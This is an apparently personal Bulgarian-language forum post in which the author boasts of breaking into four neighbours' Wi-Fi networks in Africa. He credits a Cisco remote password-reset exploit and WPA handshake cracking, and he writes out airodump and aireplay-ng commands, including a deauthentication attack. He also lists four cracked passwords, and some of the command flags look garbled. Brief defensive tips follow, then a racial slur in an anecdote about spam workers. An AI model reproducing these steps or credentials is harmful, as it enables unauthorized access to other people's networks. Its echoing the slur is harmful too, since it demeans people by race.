В Африка съм и няма интернет. Хазаяина ми го пуска и спира когато си иска. Интернет компаният иска тукашна лична карта за да ти пусне интернет и се принудих да завзема... 4 мрежи. С доста ривърс енжиниъринг набарах че всичкото рутер е Цисковец. И заже за Цисковеца съществува експлойт за отдалечено сменяне на паролата. Просто трябва да знаеш външния IP на Циското и сменяш за 2 милисекунди на root паролата. Даже не изисква стара парола, направо презаписва нова.
Та след като разбрах какъв е хардуера разбрах че паролите за интернета са цифрички отстрани на етикетите на кутиите ми а BSSID - та пак ги взимат от тези етикети...
Та със помоща на богинята
http://Кали (да Индийската богиня), и помоща на един приятел който ми задели 10-тина ксеонски ядра си осигурих достъп до тия 4 мрежи. И в един момент се сещам за един професор от БАН и му пиша, и го питам:
- Суперкомпютър имаш ли (не в къщи а на работа)? И той ми отговаря -
- Имам един стар ама сега ще кандидатстваме за нова техника че тая е на повече от 5 години.
Говорим си, говорим си... И му давам да върти едни матрици, той римуут ги пуска. И ми казва, тамън ги пуснах и станах от компютъра, няма и 2-3 минути и ми изплю отговора.
Та няма пълно щастие, няма пълна защита. Ето така ви слухтят:
airodump wlan0 - така сканират ефира, сонита, LG-та, Самсуняци, Ябълки, всичко показва и от тука си избираш BSSID-то
aireplay -c канал_на_мрежата -W файл_където_да_пише_прихванати_данни -bssid BSSID_на_мрежата wlan0 - така сканират за "ръкостискане" между BSSID и ЕSSID
И в друг терминал почваш да "ухажваш" мрежата с:
aireplay-ng --deauth -a BSSID wlan0
Като хванеш ръкостискането ти трябва ферма от сървъвни ядра или SLI на CUDA. В моя случай беше Pentium D 925 ми даваше за изчисление 700 часа!!! Ако ви карат с речник, не е сигурно че ще ви намерят. В моя случай знаех формата на думата 9 знака само цифри. Сгенерирания речник е 10 гигабайта и аз за по лесно да не пиша и чета от диска пайпнах изхода на генератора към каменотрошачката и получих:
263404757
245143749
245458366
245489875
Истествено че може лекинко да се позащитите
1. Да кажете че само 1 или 2 устройства могат да се вързват едновременно към уайерлеса.
2. защита но мак! Имате смартфон, влагате му мака в рутера и като се закачи някой и не е с мака на телефона ви го разкача. Това е временно решение докато не пуснат пак въздушния дъмп и не видят на телефона ви мака...
Няма пълно щастие! Ейго на, директор съм! Ама в Африка... Получавам заплата ама давам 400 $ за наем...
F*ck this curved field!
В София на един току що инсталиран Уиндоус без парола на Administrator видях как ремуут юзър се беше закачил и си ровеше по диска... Може и бот да е било, ама се беше логнал римут!
Нали всички сте чували за нигерийски спам!?! Та това са едни халета с 20-40 метра редици от маси и от двете страни компютри през 1 метър и по един негър и така 24 часа. Взимаш си 200-300 човека, монитори 15-17-ки, мишки с топчета. И няма 6 няма 5. Щом сестра ми я удариха с тоя спам... 30$ - 40$ на човек на месец...